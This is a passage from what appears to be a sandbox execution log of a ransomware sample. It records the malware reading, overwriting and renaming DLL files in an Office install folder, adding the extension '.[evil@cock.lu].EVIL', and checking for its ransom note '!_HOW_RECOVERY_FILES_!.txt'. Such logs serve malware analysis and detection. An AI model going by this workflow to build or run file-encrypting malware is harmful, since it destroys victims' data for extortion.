lpNumberOfBytesRead=0x84b0fddcc0*=0x58c0, lpOverlapped=0x0) returned 1 [0103.880] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.880] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.880] _errno () returned 0x84b1160840 [0103.880] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.880] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x58e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x58e0, lpOverlapped=0x0) returned 1 [0103.881] CloseHandle (hObject=0x1a4) returned 1 [0103.881] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.882] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.882] __uncaught_exception () returned 0x84b1160800 [0103.882] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.882] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.883] ??_V@YAXPEAX@Z () returned 0x1 [0103.886] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.886] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.886] wcsstr (_Str="api-ms-win-crt-environment-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.886] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll") returned 84 [0103.886] wcscmp (_String1="api-ms-win-crt-environment-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.886] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-environment-l1-1-0.dll") returned 0x0 [0103.886] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll") returned 0x54 [0103.886] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.888] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0103.908] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.908] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.908] _errno () returned 0x84b1160840 [0103.908] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0103.908] CloseHandle (hObject=0x1a4) returned 1 [0103.908] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.909] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.909] __uncaught_exception () returned 0x84b1160800 [0103.909] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.909] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.909] ??_V@YAXPEAX@Z () returned 0x1 [0103.913] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-environment-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.913] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.913] wcsstr (_Str="api-ms-win-crt-filesystem-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.913] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 83 [0103.913] wcscmp (_String1="api-ms-win-crt-filesystem-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.913] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-filesystem-l1-1-0.dll") returned 0x0 [0103.913] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 0x53 [0103.913] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.915] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x50c0, lpOverlapped=0x0) returned 1 [0103.938] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.938] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.938] _errno () returned 0x84b1160840 [0103.938] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.938] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x50e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x50e0, lpOverlapped=0x0) returned 1 [0103.938] CloseHandle (hObject=0x1a4) returned 1 [0103.938] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.938] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.939] __uncaught_exception () returned 0x84b1160800 [0103.939] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.939] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.939] ??_V@YAXPEAX@Z () returned 0x1 [0103.943] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-filesystem-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.943] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.943] wcsstr (_Str="api-ms-win-crt-heap-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.943] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll") returned 77 [0103.943] wcscmp (_String1="api-ms-win-crt-heap-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.943] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-heap-l1-1-0.dll") returned 0x0 [0103.943] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll") returned 0x4d [0103.943] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.945] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4cc0, lpOverlapped=0x0) returned 1 [0103.954] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.954] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.954] _errno () returned 0x84b1160840 [0103.954] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.954] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ce0, lpOverlapped=0x0) returned 1 [0103.954] CloseHandle (hObject=0x1a4) returned 1 [0103.954] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.954] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.954] __uncaught_exception () returned 0x84b1160800 [0103.954] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.955] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.955] ??_V@YAXPEAX@Z () returned 0x1 [0103.959] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-heap-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.959] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.959] wcsstr (_Str="api-ms-win-crt-locale-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.959] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll") returned 79 [0103.959] wcscmp (_String1="api-ms-win-crt-locale-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.959] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-locale-l1-1-0.dll") returned 0x0 [0103.959] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll") returned 0x4f [0103.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.961] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0103.977] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.977] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.977] _errno () returned 0x84b1160840 [0103.977] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.977] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0103.978] CloseHandle (hObject=0x1a4) returned 1 [0103.978] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.978] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.978] __uncaught_exception () returned 0x84b1160800 [0103.978] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.978] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.979] ??_V@YAXPEAX@Z () returned 0x1 [0103.982] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.982] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.982] wcsstr (_Str="api-ms-win-crt-math-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.982] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll") returned 77 [0103.982] wcscmp (_String1="api-ms-win-crt-math-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.983] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-math-l1-1-0.dll") returned 0x0 [0103.983] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll") returned 0x4d [0103.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.985] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x6cc0, lpOverlapped=0x0) returned 1 [0104.013] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.013] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.013] _errno () returned 0x84b1160840 [0104.014] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.014] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x6ce0, lpOverlapped=0x0) returned 1 [0104.014] CloseHandle (hObject=0x1a4) returned 1 [0104.014] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.014] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.014] __uncaught_exception () returned 0x84b1160800 [0104.014] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.015] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.015] ??_V@YAXPEAX@Z () returned 0x1 [0104.018] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.019] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.019] wcsstr (_Str="api-ms-win-crt-multibyte-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.019] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 82 [0104.019] wcscmp (_String1="api-ms-win-crt-multibyte-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.019] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-multibyte-l1-1-0.dll") returned 0x0 [0104.019] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 0x52 [0104.019] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.021] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x68c0, lpOverlapped=0x0) returned 1 [0104.057] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.057] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.057] _errno () returned 0x84b1160840 [0104.057] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.057] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x68e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x68e0, lpOverlapped=0x0) returned 1 [0104.057] CloseHandle (hObject=0x1a4) returned 1 [0104.057] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.057] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.057] __uncaught_exception () returned 0x84b1160800 [0104.057] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.058] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.058] ??_V@YAXPEAX@Z () returned 0x1 [0104.061] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-multibyte-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.061] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.061] wcsstr (_Str="api-ms-win-crt-private-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.061] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll") returned 80 [0104.061] wcscmp (_String1="api-ms-win-crt-private-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.061] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-private-l1-1-0.dll") returned 0x0 [0104.061] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll") returned 0x50 [0104.061] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0104.063] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x114c0, lpOverlapped=0x0) returned 1 [0104.083] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.083] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0104.083] _errno () returned 0x84b1160840 [0104.083] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x114e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x114e0, lpOverlapped=0x0) returned 1 [0104.083] CloseHandle (hObject=0x1a4) returned 1 [0104.083] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0104.083] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0104.083] __uncaught_exception () returned 0x84b1160800 [0104.083] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0104.084] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0104.181] ??_V@YAXPEAX@Z () returned 0x1 [0104.184] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-private-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0104.184] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0104.184] wcsstr (_Str="api-ms-win-crt-process-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0104.184] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll") returned 80 [0104.184] wcscmp (_String1="api-ms-win-crt-process-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0104.184] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-process-l1-1-0.dll") returned 0x0 [0104.184] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll") returned 0x50 [0104.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\microsoft 